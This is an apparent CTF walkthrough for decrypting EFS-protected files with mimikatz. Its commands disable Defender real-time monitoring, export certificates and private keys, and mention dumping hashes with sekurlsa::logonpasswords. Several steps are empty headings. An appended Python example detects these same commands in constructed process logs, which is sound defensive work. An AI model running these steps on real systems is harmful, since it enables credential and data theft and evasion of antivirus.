Decrypt EFS encrypted files with mimikatz

Requirements: System/root level access

Example: We have a root flag that we can't read even as the SYSTEM user. We do the steps below:

1) Lists which users can decrypt the file, together with the certificate thumbprint, which is needed later to export the certificate to a .der file with mimikatz

cipher /c root.txt 

2) Disable AV to safely download mimikatz to victim machine

powershell set-mppreference -disablerealtimemonitoring $true 

3) Transfer mimikatz.exe to the machine

4)

./mimikatz.exe

5)

privilege::debug

6) Obtain the certificate (public key) and export it to a .der file.

crypto::system /file:"C:\Users\USER\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CERTIFICATE_STRING" /export

7) Verify that the private key is located in this container. Hint: the pUniqueName shown is the same as the container name seen earlier.

dpapi::capi /in:"C:\Users\USER\AppData\Roaming\Microsoft\Crypto\RSA\USER_SID\RANDOM_NUMBERS" 

8) HINT: We can also use the user's SHA1 hash to decrypt the masterkey. The SHA1 of the user can be dumped with the sekurlsa::logonpasswords command.

9) Obtain the private key

10) Transfer the .der and the .pvk files to attacking machine with the method of your choice

11) Attacking machine:

12) Attacking machine:

13) Generate a certificate .pfx file by using the public and private .pem files we previously generated from the files extracted by mimikatz

14) Transfer the cert.pfx file to the machine

15) Victim machine:

16) Now we can finally read the root flag :p
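
The same chain of steps, seen from the blue-team side: an added example (not from the original page) that runs this page's own indicators (cipher /c, Set-MpPreference disabling real-time monitoring, the mimikatz modules used above) over constructed process-creation records and flags hosts where several of them fire together. The event tuples, host names and rule names are made up for the example.

```python
import re

# Constructed sample process-creation records: (timestamp, host, user, command line).
# They are invented for this example and only mimic a simplified 4688/Sysmon feed.
SAMPLE_EVENTS = [
    ("09:58:10", "WS01", "CORP\\svc_backup", "cipher /c C:\\Users\\Administrator\\Desktop\\root.txt"),
    ("09:59:02", "WS01", "CORP\\svc_backup", "powershell set-mppreference -disablerealtimemonitoring $true"),
    ("10:03:44", "WS01", "CORP\\svc_backup", "mimikatz.exe privilege::debug exit"),
    ("10:04:01", "WS01", "CORP\\svc_backup", "mimikatz.exe \"crypto::system /file:C:\\path\\CERT /export\" exit"),
    ("10:04:30", "WS01", "CORP\\svc_backup", "mimikatz.exe \"dpapi::capi /in:C:\\path\\RSA\\S-1-5-21-1\\abc\" exit"),
    ("13:20:00", "WS07", "CORP\\jdoe", "powershell Get-MpPreference"),
    ("13:21:00", "WS07", "CORP\\jdoe", "cipher /e C:\\Users\\jdoe\\Documents\\notes.txt"),
]

# One rule per step of the walkthrough above; names are this example's own.
RULES = {
    "efs_cert_recon":           re.compile(r"\bcipher(?:\.exe)?\s+/c\b", re.I),
    "defender_rtp_disabled":    re.compile(r"set-mppreference\b.*-disablerealtimemonitoring\s+\$true", re.I),
    "mimikatz_debug_privilege": re.compile(r"\bprivilege::debug\b", re.I),
    "mimikatz_cert_export":     re.compile(r"\bcrypto::system\b.*/export", re.I),
    "mimikatz_capi_keys":       re.compile(r"\bdpapi::capi\b", re.I),
}


def match_events(events):
    """Return (timestamp, host, user, rule) for every record that matches a rule."""
    hits = []
    for ts, host, user, cmdline in events:
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                hits.append((ts, host, user, name))
    return hits


def hosts_with_chain(hits, min_rules=2):
    """Hosts where at least min_rules distinct rules fired.

    A single hit (an admin running cipher /c, say) is noise; several of these
    indicators on one host is the pattern described above and worth an alert.
    """
    seen = {}
    for _, host, _, name in hits:
        seen.setdefault(host, set()).add(name)
    return sorted(h for h, names in seen.items() if len(names) >= min_rules)


if __name__ == "__main__":
    hits = match_events(SAMPLE_EVENTS)
    for hit in hits:
        print("%s %s %s -> %s" % hit)
    print("hosts to triage:", hosts_with_chain(hits))
```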
